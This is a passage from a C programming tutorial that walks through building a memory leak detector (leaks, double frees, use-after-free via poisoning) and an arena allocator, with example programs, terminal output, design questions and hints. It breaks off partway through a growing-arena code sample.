- Maintaining a registry of all active allocations (maps to: object lifetime rules)
- Detecting when `free()` is called twice on the same pointer (maps to: double free)
- Marking freed memory to detect use-after-free (maps to: dangling pointers)
- Reporting file/line where allocation happened (maps to: why bugs appear later)
- Understanding the difference between NULL, uninitialized, and dangling (maps to: pointer states)
Resources for key challenges:
- Memory Allocators 101 by Arjun Sreedharan - Understanding malloc internals
- objc.io - Dancing in the Debugger - Inspecting memory state with lldb
Key Concepts:
| Concept | Resource |
|---|---|
| Object lifetime | “Understanding and Using C Pointers” Ch. 2 - Richard Reese |
| Double-free mechanics | AddressSanitizer documentation - LLVM |
| Use-after-free detection | malloc from Scratch - Tenzin Migmar |
Difficulty: Intermediate
Time estimate: 1-2 weeks
Prerequisites: Comfort with structs, linked lists, macros
Real World Outcome
When you complete this project, you’ll have a working memory leak detector that catches bugs at runtime. Here’s what the experience looks like:
Example 1: Detecting Memory Leaks
test_leak.c:
#include <stdio.h>
#include <string.h> // strcpy
#include "leak_detector.h" // last: its malloc/free macros must not touch system headers
void create_user() {
char* name = malloc(100);
strcpy(name, "Alice");
// Oops, forgot to free!
}
int main() {
init_leak_detector();
for (int i = 0; i < 3; i++) {
create_user();
}
return 0;
}
Terminal output:
$ gcc -g test_leak.c leak_detector.c -o test_leak
$ ./test_leak
=== Memory Leak Detector Report ===
[LEAK] 100 bytes allocated at test_leak.c:7 (create_user) never freed
Address: 0x600000004000
[LEAK] 100 bytes allocated at test_leak.c:7 (create_user) never freed
Address: 0x600000004100
[LEAK] 100 bytes allocated at test_leak.c:7 (create_user) never freed
Address: 0x600000004200
Total leaks: 3 allocations, 300 bytes
Example 2: Detecting Double-Free
test_double_free.c:
#include "leak_detector.h"
int main() {
init_leak_detector();
int* data = malloc(sizeof(int) * 10);
*data = 42;
free(data);
free(data); // BUG: Double free!
return 0;
}
Terminal output:
$ ./test_double_free
[ERROR] DOUBLE-FREE DETECTED!
Pointer: 0x600000004000
Size: 40 bytes
First freed at: test_double_free.c:9
Second free at: test_double_free.c:10
Originally allocated at: test_double_free.c:6
*** Program terminated to prevent heap corruption ***
Example 3: Detecting Use-After-Free
test_use_after_free.c:
#include "leak_detector.h"
#include <stdio.h>
int main() {
init_leak_detector();
int* numbers = malloc(5 * sizeof(int));
numbers[0] = 100;
printf("Before free: numbers[0] = %d\n", numbers[0]);
free(numbers);
// BUG: Accessing freed memory
printf("After free: numbers[0] = %d\n", numbers[0]);
return 0;
}
Terminal output:
$ ./test_use_after_free
Before free: numbers[0] = 100
[WARNING] POSSIBLE USE-AFTER-FREE DETECTED!
Reading from: 0x600000004000
This memory was freed at: test_use_after_free.c:11
Originally allocated at: test_use_after_free.c:7 (20 bytes)
Memory has been poisoned with pattern: 0xDEADBEEF
After free: numbers[0] = -559038737
Example 4: Clean Program (No Leaks)
test_clean.c:
#include <stdio.h>
#include <string.h> // strcpy
#include "leak_detector.h" // last: its malloc/free macros must not touch system headers
void process_data() {
char* buffer = malloc(256);
strcpy(buffer, "Clean program!");
printf("%s\n", buffer);
free(buffer); // Properly freed!
}
int main() {
init_leak_detector();
process_data();
return 0;
}
Terminal output:
$ ./test_clean
Clean program!
=== Memory Leak Detector Report ===
No memory leaks detected!
Total allocations: 1
Total frees: 1
All memory properly cleaned up.
Step-by-Step: What You See
- During Development:
- Include your `leak_detector.h` header
- Call `init_leak_detector()` at program start
- Your detector intercepts the `malloc()` and `free()` calls in every file that includes the header, via macros
- At Runtime:
- Each allocation is registered with file/line information
- Each free is validated against the registry
- Double-frees are caught immediately
- Freed memory is “poisoned” with a recognizable pattern such as 0xDEADBEEF
- At Program Exit:
- The `atexit()` handler runs automatically
- All unfreed allocations are reported with their source locations
- You get a complete leak report without any extra work
- Understanding the Output:
- File:Line - Shows exactly where `malloc()` was called
- Address - The actual memory address (helps correlate with debugger)
- Size - How many bytes were leaked
- Poisoning - Freed memory filled with a known pattern (0xDEADBEEF, or repeated 0xDE bytes) makes use-after-free obvious
Learning milestones:
- First milestone: You understand why freeing memory doesn’t zero it out
- Second milestone: You can explain why use-after-free sometimes “works” and sometimes crashes
- Final milestone: You think about every `malloc` in terms of “who frees this and when”
The Core Question You’re Answering
“Who owns this memory, and when does it become invalid?”
This is the fundamental question of memory management. In garbage-collected languages, the runtime handles this. In C, YOU handle it. And when you get it wrong, the bugs are often silent, appearing far from where the mistake was made.
Concepts You Must Understand First
Stop and research these before coding:
- Object Lifetime
- When does memory become “alive” (usable)?
- When does it become “dead” (invalid)?
- Why can you still read “dead” memory in C? (The bytes are still there!)
- Book Reference: “Understanding and Using C Pointers” Ch. 2 - Richard Reese
- The Three Pointer States
- NULL: Explicitly points to nothing (`int* p = NULL;`)
- Valid: Points to allocated, live memory
- Dangling: Points to memory that was freed; it looks valid but isn’t
- Why is dangling the most dangerous? (Nothing in the pointer’s value tells you it’s dangling!)
- Why Bugs Appear Later Than Mistakes
- What happens immediately when you call `free(p)`? (Almost nothing visible)
- When does use-after-free actually cause visible damage? (Typically once the memory is reused for a new allocation, or the allocator’s metadata gets corrupted)
- Why is this timing unpredictable?
- Book Reference: “Effective C” Ch. 6 - Robert Seacord
- Heap Allocator Metadata
- What does the allocator store alongside your data?
- How does `free(p)` know how many bytes to free?
- What happens when this metadata gets corrupted?
- Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 9.9 - Bryant & O’Hallaron
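One common answer to “How does `free(p)` know how many bytes to free?” is a header stored just before the pointer the caller receives. glibc's malloc, for example, keeps the chunk size in a word right before the user data. Below is a sketch of the idea layered on top of `malloc`. The `sized_*` functions and the `BlockHeader` type are hypothetical names:

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

// Hypothetical header placed in front of every user block. The union with
// max_align_t pads it so the user pointer keeps malloc's alignment guarantee.
typedef union {
    size_t size;          // bytes requested by the caller
    max_align_t align;
} BlockHeader;

void* sized_malloc(size_t size) {
    if (size > SIZE_MAX - sizeof(BlockHeader)) {
        return NULL;                              // header + size would overflow
    }
    BlockHeader* h = malloc(sizeof(BlockHeader) + size);
    if (h == NULL) {
        return NULL;
    }
    h->size = size;
    return h + 1;                                 // user data starts after the header
}

size_t sized_size(const void* p) {
    return ((const BlockHeader*)p - 1)->size;     // step back over the header
}

void sized_free(void* p) {
    if (p != NULL) {
        free((BlockHeader*)p - 1);                // free the whole block, header included
    }
}
```

The same trick is one way to associate your detector's metadata (file, line) with the pointer the user receives. Note that writing past the end of the *previous* block would corrupt this header, which is exactly how overflows damage real allocator metadata.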
Questions to Guide Your Design
Before implementing, think through these:
- Tracking Allocations
- What data structure will you use to track active allocations? (Hash table? Linked list?)
- What information do you need to store per allocation? (Address, size, file, line)
- How do you associate this metadata with the pointer the user receives?
- Wrapping malloc/free
- How do you intercept `malloc` and `free` calls?
- Option 1: Macros that redefine `malloc` and `free`
- Option 2: Wrapper functions `my_malloc`, `my_free`
- How do you capture `__FILE__` and `__LINE__` at the call site?
- Detecting Double-Free
- When `free(p)` is called, how do you check if `p` was already freed?
- Should you keep freed entries in your registry, or remove them?
- What if you keep them: how do you prevent the registry from growing forever?
- Detecting Use-After-Free
- This is HARD without hardware support. What can you do?
- Option: Fill freed memory with a magic pattern (0xDEADBEEF)
- Option: Keep freed allocations in a “quarantine” before recycling
- Why can’t you catch all use-after-free at runtime?
- Detecting Leaks
- When do you report leaks? (At program exit)
- How do you ensure your leak report runs? (`atexit()`)
- What information makes a leak report useful?
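Putting these answers together gives the minimal single-file sketch below. It rests on several assumptions, all hypothetical design choices:

- Call sites use `DBG_MALLOC`/`DBG_FREE` macros rather than redefining `malloc` itself, so the detector can call the real allocator without recursing.
- A linked list serves as the registry.
- Freed blocks are poisoned with `0xDE` and kept in quarantine, never handed back to the real `free`. This keeps the poison intact and stops double frees from ever reaching the allocator.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Hypothetical call-site macros: they capture file/line but leave malloc/free
// themselves untouched, so this file can still use the real allocator.
#define DBG_MALLOC(n) debug_malloc((n), __FILE__, __LINE__)
#define DBG_FREE(p)   debug_free((p), __FILE__, __LINE__)

typedef struct Allocation {
    void* ptr;
    size_t size;
    const char* file;        // where the block was allocated
    int line;
    const char* freed_file;  // NULL while the block is still live
    int freed_line;
    struct Allocation* next;
} Allocation;

static Allocation* registry = NULL;
static size_t double_frees = 0;

static Allocation* find_allocation(const void* ptr) {
    for (Allocation* a = registry; a != NULL; a = a->next) {
        if (a->ptr == ptr) return a;
    }
    return NULL;
}

void* debug_malloc(size_t size, const char* file, int line) {
    Allocation* a = malloc(sizeof *a);
    void* ptr = malloc(size);
    if (a == NULL || ptr == NULL) {
        free(a);
        free(ptr);
        return NULL;
    }
    *a = (Allocation){ptr, size, file, line, NULL, 0, registry};
    registry = a;                            // newest entry first
    return ptr;
}

void debug_free(void* ptr, const char* file, int line) {
    if (ptr == NULL) return;                 // free(NULL) is a no-op
    Allocation* a = find_allocation(ptr);
    if (a == NULL) {
        fprintf(stderr, "[ERROR] free of untracked pointer %p at %s:%d\n", ptr, file, line);
        return;
    }
    if (a->freed_file != NULL) {
        fprintf(stderr, "[ERROR] DOUBLE-FREE of %p: first at %s:%d, again at %s:%d\n",
                ptr, a->freed_file, a->freed_line, file, line);
        double_frees++;
        return;                              // never hand it to the real free twice
    }
    memset(ptr, 0xDE, a->size);              // poison: stale reads now see 0xDE bytes
    a->freed_file = file;                    // quarantine: the block stays allocated
    a->freed_line = line;                    // so the poison can't be overwritten
}

size_t report_leaks(void) {
    size_t leaks = 0;
    for (Allocation* a = registry; a != NULL; a = a->next) {
        if (a->freed_file == NULL) {
            printf("[LEAK] %zu bytes allocated at %s:%d never freed\n",
                   a->size, a->file, a->line);
            leaks++;
        }
    }
    return leaks;
}

size_t double_free_count(void) { return double_frees; }

static void report_at_exit(void) { report_leaks(); }

void init_leak_detector(void) {
    atexit(report_at_exit);                  // leak report runs when main returns
}
```

The quarantine trades memory for reliability: nothing is ever returned to the system, and lookups are O(n) in the number of allocations. That is fine for a learning tool but not for a long-running program.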
Thinking Exercise: Trace the Bug
Trace what happens with this code:
#include <stdlib.h>
#include <string.h>
void create_user(void) {
char* name = malloc(100);
strcpy(name, "Alice");
// Oops, forgot to free or return name
}
int main() {
for (int i = 0; i < 1000; i++) {
create_user();
}
// 100,000 bytes leaked!
return 0;
}
Questions while tracing:
- How would your detector report this leak?
- What file and line would you report?
- How much total memory was leaked?
Now trace this:
#include <stdio.h>
#include <stdlib.h>
int main(void) {
int* p = malloc(sizeof(int));
*p = 42;
free(p);
// p is now dangling
int* q = malloc(sizeof(int));
*q = 100;
// q might get the same address as p!
printf("*p = %d\n", *p); // Use-after-free!
// Might print 100, might print 42, might crash
}
Questions:
- Why might `*p` print `100`?
- How could your detector catch this?
- What magic value could you write to freed memory?
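You can observe the address reuse behind the first question without reading through the dangling pointer: record the old address as an integer before freeing. Here is a sketch, where `same_address_reused` is a hypothetical name. On glibc, a same-sized request made right after a `free` usually gets the just-freed block back, but no allocator guarantees it:

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

// Returns 1 if a same-sized malloc right after free(p) hands back p's old
// address, 0 if not, -1 if allocation failed. The old address is saved as an
// integer first, so the dangling pointer is never dereferenced or reused.
int same_address_reused(void) {
    int* p = malloc(sizeof(int));
    if (p == NULL) return -1;
    uintptr_t old_address = (uintptr_t)p;
    free(p);                                   // p is dangling from here on

    int* q = malloc(sizeof(int));
    if (q == NULL) return -1;
    int reused = ((uintptr_t)q == old_address);
    printf("old block: %#jx  new block: %p  reused: %s\n",
           (uintmax_t)old_address, (void*)q, reused ? "yes" : "no");
    free(q);
    return reused;
}
```

If it reports reuse, then in the trace above `*p` and `*q` name the same bytes, so `*p` reads the `100` just written through `q`.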
The Interview Questions They’ll Ask
Prepare to answer these:
- “What is a memory leak? How do you detect them?”
- “What is use-after-free? Why is it dangerous for security?”
- “What is double-free? What can go wrong?”
- “How does Valgrind detect memory errors?”
- “What’s the difference between a dangling pointer and a NULL pointer?”
- “If you free memory, why can you sometimes still read from it?”
Hints in Layers (Only If Stuck)
Hint 1: Use Macros to Capture Call Site
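Define macros that wrap your functions:
```c
#include <stdlib.h>  // system headers first, before the macros below exist

#define malloc(size) debug_malloc(size, __FILE__, __LINE__)
#define free(ptr) debug_free(ptr, __FILE__, __LINE__)

void* debug_malloc(size_t size, const char* file, int line);
void debug_free(void* ptr, const char* file, int line);
```
Now every `malloc` call in a file that includes this header automatically captures where it happened. Keep these macros out of `leak_detector.c` itself (or `#undef` them there). Otherwise the real `malloc` call inside `debug_malloc` would expand into another `debug_malloc` call and recurse forever.
Hint 2: Simple Registry Structure
A linked list works fine for a learning project:
```c
typedef struct Allocation {
    void* ptr;
    size_t size;
    const char* file;
    int line;
    int freed;  // 0 = active, 1 = freed
    struct Allocation* next;
} Allocation;

static Allocation* registry = NULL;
```
Hint 3: Poison Freed Memory
When freeing, fill the memory with a recognizable pattern:
```c
void debug_free(void* ptr, const char* file, int line) {
    if (ptr == NULL) return;  // free(NULL) is a no-op
    Allocation* alloc = find_allocation(ptr);
    if (alloc == NULL || alloc->freed) {
        // Untracked pointer or double free: report it, never free it again
        fprintf(stderr, "[ERROR] invalid or double free of %p at %s:%d\n", ptr, file, line);
        return;
    }
    memset(ptr, 0xDE, alloc->size);  // Poison with 0xDE
    alloc->freed = 1;
    free(ptr);
}
```
If you later read `0xDEDEDEDE`, you know it's use-after-free. Once the real `free` runs, though, the allocator may reuse those bytes or store its own bookkeeping in them. The pattern is therefore only reliable while freed blocks are held back (quarantined) for a while.
Hint 4: Report Leaks at Exit
Use `atexit()` to register a cleanup function:
```c
void report_leaks(void) {
    for (Allocation* a = registry; a; a = a->next) {
        if (!a->freed) {
            printf("[LEAK] %zu bytes at %s:%d\n", a->size, a->file, a->line);
        }
    }
}

void init_leak_detector(void) {
    static int initialized = 0;
    if (!initialized) {  // register the report only once
        atexit(report_leaks);
        initialized = 1;
    }
}
```
Call `init_leak_detector()` at startup (or from the first `debug_malloc`).
Books That Will Help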
| Topic | Book | Chapter |
|---|---|---|
| Pointer lifetime and ownership | “Understanding and Using C Pointers” | Ch. 2 |
| Heap allocator internals | “Computer Systems: A Programmer’s Perspective” | Ch. 9.9 |
| Memory debugging techniques | “The Art of Debugging with GDB, DDD, and Eclipse” | Ch. 5 |
| Secure memory handling | “Effective C” | Ch. 6 |
| Valgrind and sanitizers | “The Linux Programming Interface” | Ch. 7 |
Project 4: Arena Allocator
- File: SPRINT_1_REAL_WORLD_PROJECTS.md
- Main Programming Language: C
- Alternative Programming Languages: Rust, Zig, C++
- Coolness Level: Level 4: Hardcore Tech Flex
- Business Potential: Level 1: The “Resume Gold”
- Difficulty: Level 2: Intermediate (The Developer)
- Knowledge Area: Memory Management, Allocators
- Software or Tool: mmap, Custom Memory Allocator
- Main Book: C Interfaces and Implementations by David Hanson
What you’ll build: A bump/arena allocator that allocates memory from a pre-allocated block, with O(1) allocation and bulk-free semantics.
Why it teaches memory & control: This is where you understand why allocators exist. You’ll see that malloc is just software—someone wrote it. By building the simplest possible allocator, you understand memory as a raw resource to be carved up, not a magic service.
Core challenges you’ll face:
- Requesting a large block from the OS with `mmap` or `malloc` (maps to: why allocators exist)
- Maintaining a “bump pointer” that advances with each allocation (maps to: heap layout)
- Handling alignment requirements (maps to: memory layout details)
- Implementing reset/free-all (maps to: lifetime management)
- Understanding when arena allocation is appropriate vs general-purpose (maps to: allocator design)
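Alignment is the one piece of arithmetic a bump allocator can't skip. After a 100-byte allocation, a following `double` needs an offset that's a multiple of its alignment (8 on common platforms), so the next start is 104, not 100. Below is the usual power-of-two round-up, as a sketch; `align_up` and `is_aligned` are hypothetical helper names:

```c
#include <stddef.h>
#include <stdint.h>

// Round offset up to the next multiple of align. align must be a power of two:
// then align - 1 is a mask of the low bits, and clearing them rounds down,
// so adding align - 1 first turns that into rounding up.
size_t align_up(size_t offset, size_t align) {
    return (offset + align - 1) & ~(align - 1);
}

// Nonzero if ptr's address is a multiple of align (again a power of two).
int is_aligned(const void* ptr, size_t align) {
    return ((uintptr_t)ptr & (align - 1)) == 0;
}
```

The mask trick only works when `align` is a power of two. That holds for every alignment C allows, so it is safe for any `_Alignof` value.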
Resources for key challenges:
- Memory Allocators 101 by Arjun Sreedharan - Core allocator concepts
- Build Your Own Memory Allocator - Giovanni Iannaccone
Key Concepts:
| Concept | Resource |
|---|---|
| Arena/bump allocation | malloc() from Scratch - Tenzin Migmar |
| Memory alignment | “Understanding and Using C Pointers” Ch. 1 - Richard Reese |
| mmap system call | Master memory management - 42 Studio |
Difficulty: Intermediate
Time estimate: Weekend - 1 week
Prerequisites: Project 3 or understanding of malloc/free
Real World Outcome
When you complete this project, you’ll have a blazingly fast arena allocator that demonstrates the power of specialized memory management. Here’s what you’ll experience:
Example 1: Basic Arena Usage
test_arena.c:
#include "arena.h"
#include <stdio.h>
#include <string.h> // strcpy
typedef struct {
char name[50];
int score;
} Player;
int main() {
// Create a 1MB arena
Arena* arena = arena_create(1024 * 1024);
printf("Arena created: %zu bytes\n\n", arena->capacity);
// Allocate some players
Player* p1 = arena_alloc(arena, sizeof(Player));
strcpy(p1->name, "Alice");
p1->score = 100;
printf("After allocating p1:\n");
printf(" Used: %zu bytes\n", arena->offset);
printf(" Free: %zu bytes\n\n", arena->capacity - arena->offset);
Player* p2 = arena_alloc(arena, sizeof(Player));
strcpy(p2->name, "Bob");
p2->score = 200;
printf("After allocating p2:\n");
printf(" Used: %zu bytes\n", arena->offset);
printf(" Free: %zu bytes\n\n", arena->capacity - arena->offset);
int* scores = arena_alloc(arena, 100 * sizeof(int));
printf("After allocating 100 integers:\n");
printf(" Used: %zu bytes\n", arena->offset);
printf(" Free: %zu bytes\n\n", arena->capacity - arena->offset);
// Reset everything at once - O(1)!
arena_reset(arena);
printf("After arena_reset():\n");
printf(" Used: %zu bytes (back to zero!)\n", arena->offset);
printf(" Free: %zu bytes (all available again!)\n\n", arena->capacity - arena->offset);
arena_destroy(arena);
return 0;
}
Terminal output:
$ gcc -g test_arena.c arena.c -o test_arena
$ ./test_arena
Arena created: 1048576 bytes
After allocating p1:
Used: 56 bytes
Free: 1048520 bytes
After allocating p2:
Used: 112 bytes
Free: 1048464 bytes
After allocating 100 integers:
Used: 512 bytes
Free: 1048064 bytes
After arena_reset():
Used: 0 bytes (back to zero!)
Free: 1048576 bytes (all available again!)
Example 2: Visual Bump Pointer Advancement
test_visual.c:
#include "arena.h"
#include <stdio.h>
void print_arena_state(Arena* arena, const char* label) {
printf("%s\n", label);
printf("├─ Base: %p\n", (void*)arena->base);
printf("├─ Current: %p (base + %zu)\n",
(void*)(arena->base + arena->offset), arena->offset);
printf("├─ Capacity: %zu bytes\n", arena->capacity);
printf("└─ Used: %.2f%%\n\n",
(arena->offset * 100.0) / arena->capacity);
}
int main() {
Arena* arena = arena_create(1024);
print_arena_state(arena, "Initial state:");
void* a = arena_alloc(arena, 100);
print_arena_state(arena, "After arena_alloc(100):");
void* b = arena_alloc(arena, 200);
print_arena_state(arena, "After arena_alloc(200):");
void* c = arena_alloc(arena, 300);
print_arena_state(arena, "After arena_alloc(300):");
arena_destroy(arena);
return 0;
}
Terminal output:
$ ./test_visual
Initial state:
├─ Base: 0x100204000
├─ Current: 0x100204000 (base + 0)
├─ Capacity: 1024 bytes
└─ Used: 0.00%
After arena_alloc(100):
├─ Base: 0x100204000
├─ Current: 0x100204064 (base + 100)
├─ Capacity: 1024 bytes
└─ Used: 9.77%
After arena_alloc(200):
├─ Base: 0x100204000
├─ Current: 0x10020412c (base + 300)
├─ Capacity: 1024 bytes
└─ Used: 29.30%
After arena_alloc(300):
├─ Base: 0x100204000
├─ Current: 0x100204258 (base + 600)
├─ Capacity: 1024 bytes
└─ Used: 58.59%
Example 3: Performance Benchmark vs malloc
benchmark.c:
#include "arena.h"
#include <stdio.h>
#include <time.h>
#include <stdlib.h>
#define ITERATIONS 1000000
double benchmark_malloc(void) {
clock_t start = clock();
void* ptrs[100];
for (int i = 0; i < ITERATIONS; i++) {
for (int j = 0; j < 100; j++) {
ptrs[j] = malloc(64);
}
for (int j = 0; j < 100; j++) {
free(ptrs[j]);
}
}
double elapsed = (double)(clock() - start) / CLOCKS_PER_SEC;
printf("malloc/free: %.3f seconds\n", elapsed);
return elapsed;
}
double benchmark_arena(void) {
clock_t start = clock();
Arena* arena = arena_create(64 * 100); // Big enough for 100 allocations
for (int i = 0; i < ITERATIONS; i++) {
for (int j = 0; j < 100; j++) {
arena_alloc(arena, 64);
}
arena_reset(arena); // O(1) reset!
}
arena_destroy(arena);
double elapsed = (double)(clock() - start) / CLOCKS_PER_SEC;
printf("Arena alloc: %.3f seconds\n", elapsed);
return elapsed;
}
int main(void) {
printf("Benchmarking %d iterations of 100 allocations each...\n\n", ITERATIONS);
double malloc_time = benchmark_malloc();
double arena_time = benchmark_arena();
printf("Arena is %.1fx faster!\n", malloc_time / arena_time);
return 0;
}
Terminal output:
$ gcc -O2 benchmark.c arena.c -o benchmark
$ ./benchmark
Benchmarking 1000000 iterations of 100 allocations each...
malloc/free: 8.342 seconds
Arena alloc: 0.241 seconds
Arena is 34.6x faster!
Example 4: Real-World Game Frame Simulation
game_frame.c:
```c
#include "arena.h"
#include <stdio.h>
#include <stdlib.h>

typedef struct {
    float x, y, z;
} Vector3;

typedef struct {
    char name[32];
    Vector3 position;
    Vector3 velocity;
} Entity;

void simulate_frame(Arena* frame_arena, int frame_num) {
    // Allocate temporary data for this frame
    Entity* entities = arena_alloc(frame_arena, 1000 * sizeof(Entity));
    Vector3* temp_vectors = arena_alloc(frame_arena, 500 * sizeof(Vector3));
    char* debug_buffer = arena_alloc(frame_arena, 4096);
    if (entities == NULL || temp_vectors == NULL || debug_buffer == NULL) {
        fprintf(stderr, "Frame %d: arena out of space\n", frame_num);
        return;
    }
    // Simulate frame...
    snprintf(debug_buffer, 4096, "Frame %d: 1000 entities, 500 vectors", frame_num);
    printf("Frame %d - Arena used: %zu bytes\n", frame_num, frame_arena->offset);
    // No need to free individual allocations: the caller resets
    // the whole arena in O(1) at the end of the frame
}

int main(void) {
    Arena* frame_arena = arena_create(1024 * 1024); // 1MB per frame
    if (frame_arena == NULL) {
        fprintf(stderr, "arena_create failed\n");
        return EXIT_FAILURE;
    }
    printf("Simulating game frames...\n\n");
    for (int i = 0; i < 5; i++) {
        simulate_frame(frame_arena, i + 1);
        arena_reset(frame_arena); // Reset for next frame: O(1)
        printf(" Reset complete - ready for next frame\n\n");
    }
    arena_destroy(frame_arena);
    printf("Game simulation complete!\n");
    return 0;
}
```
Terminal output:
```
$ ./game_frame
Simulating game frames...

Frame 1 - Arena used: 66096 bytes
 Reset complete - ready for next frame

Frame 2 - Arena used: 66096 bytes
 Reset complete - ready for next frame

Frame 3 - Arena used: 66096 bytes
 Reset complete - ready for next frame

Frame 4 - Arena used: 66096 bytes
 Reset complete - ready for next frame

Frame 5 - Arena used: 66096 bytes
 Reset complete - ready for next frame

Game simulation complete!
```
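To sanity-check the "Arena used" figure, count what one frame requests. A minimal sketch, assuming 4-byte floats and an `arena_alloc` that adds no per-allocation header; `frame_bytes` is a hypothetical helper, not part of `arena.h`:

```c
#include <assert.h>
#include <stddef.h>

// Same layouts as in game_frame.c.
typedef struct {
    float x, y, z;
} Vector3;

typedef struct {
    char name[32];
    Vector3 position;
    Vector3 velocity;
} Entity;

// The arithmetic below assumes 4-byte floats, as on mainstream platforms.
static_assert(sizeof(float) == 4, "sizes below assume 4-byte floats");

// Hypothetical helper: bytes one simulated frame requests from the arena,
// assuming arena_alloc adds no header or padding between requests.
size_t frame_bytes(size_t entities, size_t vectors, size_t debug_bytes) {
    return entities * sizeof(Entity)    // 56 bytes each: 32 + 12 + 12
         + vectors * sizeof(Vector3)    // 12 bytes each
         + debug_bytes;
}
```

Under those assumptions one frame uses 1000 * 56 + 500 * 12 + 4096 = 66096 bytes. All three request sizes are multiples of 16, so aligning each allocation to 16 bytes would not change the total.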
Step-by-Step: What You See
- Arena Creation:
- Request a large memory block from the OS via `mmap()`
- Initialize it with a base pointer, offset = 0, and the capacity
- One syscall up front; `malloc` also batches its requests to the OS, but it pays bookkeeping costs on every call
- Allocation Pattern:
- Watch the offset (bump pointer) advance with each allocation
- No searching for free blocks - just increment!
- O(1) allocation every time
- The O(1) Reset Magic:
- `arena_reset()` just sets offset back to 0
- All allocations “disappear” instantly
- Memory is reused without any syscalls
- Performance Benefits:
- Expect large speedups for batch allocation patterns (about 35x in the benchmark run above; the exact factor depends on your malloc)
- Perfect for frame-based workloads (games, request handlers)
- No fragmentation between allocations during the arena's lifetime (only alignment padding is wasted)
- Visual Understanding:
- Base pointer never changes
- Current pointer = base + offset
- Reset moves current back to base
- Like rewinding a tape - instant and free!
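The "rewinding a tape" picture can be checked directly. A minimal sketch, using a hypothetical `MiniArena` over a caller-supplied buffer instead of `mmap` so it runs anywhere; after a reset, the next allocation comes back at exactly the base address:

```c
#include <assert.h>
#include <stddef.h>

// Hypothetical minimal arena over a caller-supplied buffer (no mmap),
// just enough to observe what reset does.
typedef struct {
    char  *base;
    size_t offset;
    size_t capacity;
} MiniArena;

void mini_init(MiniArena *a, void *buf, size_t cap) {
    a->base = buf;
    a->offset = 0;
    a->capacity = cap;
}

void *mini_alloc(MiniArena *a, size_t size) {
    assert(a->offset <= a->capacity);           // invariant of a bump arena
    if (size > a->capacity - a->offset) {
        return NULL;                            // out of space
    }
    void *p = a->base + a->offset;              // current = base + offset
    a->offset += size;                          // the "bump"
    return p;
}

void mini_reset(MiniArena *a) {
    a->offset = 0;                              // rewind: everything is "freed" at once
}
```

For example, with a 256-byte buffer, two 100-byte allocations land at base and base + 100, a third one fails, and after `mini_reset` a new 100-byte allocation returns base again.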
Learning milestones:
- First milestone: You understand that `malloc` is just software managing a byte array
- Second milestone: You can explain the tradeoff between flexibility and performance in allocators
- Final milestone: You see memory as a resource to be managed, not a magic service
The Core Question You’re Answering
“What if I could allocate memory with just a pointer increment, and free everything at once?”
This is the arena allocator’s insight. It trades flexibility (individual frees) for speed (O(1) allocation, O(1) bulk free). By building one, you understand that malloc is just one way to manage memory—and often not the best way.
Concepts You Must Understand First
Stop and research these before coding:
- Why Allocators Exist
- Why can’t you just ask the OS for memory every time you need it?
- What’s the overhead of a syscall vs a function call?
- Why does `malloc` batch requests to the OS?
- Book Reference: “Operating Systems: Three Easy Pieces” Ch. 17 - Arpaci-Dusseau
- The Bump Allocator (Simplest Possible)
- What is a bump pointer?
- Why is bump allocation O(1)?
- What’s the downside? (You can’t free individual allocations)
- When is this acceptable? (Short-lived, batch allocations)
- Memory Alignment
- Why must some data types start at specific addresses?
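- What happens if you store an `int` at an odd address? (On some CPUs it faults; on x86 it usually just runs slower. In C, accessing an `int` through a misaligned pointer is undefined behavior either way.)
- How do you “round up” a pointer to the next aligned address?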
- Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 3.9.3 - Bryant & O’Hallaron
- Getting Memory from the OS
- What is `mmap` and when do you use it?
- What’s the difference between `mmap` and `sbrk`?
- Why might you prefer `mmap` for an arena?
- Book Reference: “The Linux Programming Interface” Ch. 49 - Michael Kerrisk
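The `mmap` questions are easier with a call in front of you. A minimal sketch for Linux or macOS of requesting a private, anonymous, zero-filled region directly from the OS; `os_reserve` and `os_release` are hypothetical wrapper names:

```c
#define _DEFAULT_SOURCE   // expose MAP_ANONYMOUS on glibc even in strict modes
#include <assert.h>
#include <stddef.h>
#include <sys/mman.h>

// Ask the OS for `size` bytes of zero-filled, private, anonymous memory.
// Returns NULL on failure (mmap itself reports failure with MAP_FAILED, not NULL).
void *os_reserve(size_t size) {
    assert(size > 0);
    void *p = mmap(NULL, size, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    return p == MAP_FAILED ? NULL : p;
}

// Give the region back to the OS; `size` must match the one passed to os_reserve.
int os_release(void *p, size_t size) {
    return munmap(p, size);
}
```

Unlike `sbrk`, which moves the end of a single heap segment, each `mmap` call returns an independent region that `munmap` can return to the OS on its own, which suits an arena that owns one large block.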
Questions to Guide Your Design
Before implementing, think through these:
- Arena Structure
- What fields does your Arena struct need?
- At minimum: base pointer, current offset, and capacity
- Should you store alignment? Should you allow multiple blocks?
- Allocation
- How do you “bump” the pointer?
- What if the requested size exceeds remaining space?
- How do you handle alignment for different types?
- Reset vs Destroy
- What does `arena_reset` do? (Set offset back to 0)
- What does `arena_destroy` do? (Free the underlying memory)
- Why is reset useful? (Reuse the same arena for the next batch)
- When to Use Arenas
- Game frames: allocate during frame, reset at frame end
- Request handling: allocate during request, reset when done
- Parsing: allocate AST nodes, free everything when parse is complete
- What do these patterns have in common?
- Growing Arenas (Advanced)
- What if you run out of space?
- Option 1: Return NULL (fail)
- Option 2: Allocate a new block, chain them together
- What’s the tradeoff?
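Option 2 can be sketched as a linked list of blocks. A minimal sketch with hypothetical names (`GrowArena`, `grow_alloc`), using `malloc` for each block and no alignment handling (you would combine it with `align_up` in real use):

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

// Hypothetical growing arena: a chain of blocks, newest first.
typedef struct Block {
    struct Block *next;     // previously filled block
    size_t offset;          // bytes used in this block
    size_t capacity;        // bytes available in data[]
    char data[];            // C99 flexible array member
} Block;

typedef struct {
    Block *head;            // block currently being bumped
    size_t block_size;      // default capacity of new blocks
} GrowArena;

static Block *block_new(size_t capacity) {
    if (capacity > SIZE_MAX - sizeof(Block)) return NULL;  // size overflow
    Block *b = malloc(sizeof(Block) + capacity);
    if (b != NULL) {
        b->next = NULL;
        b->offset = 0;
        b->capacity = capacity;
    }
    return b;
}

void grow_init(GrowArena *a, size_t block_size) {
    assert(block_size > 0);
    a->head = NULL;
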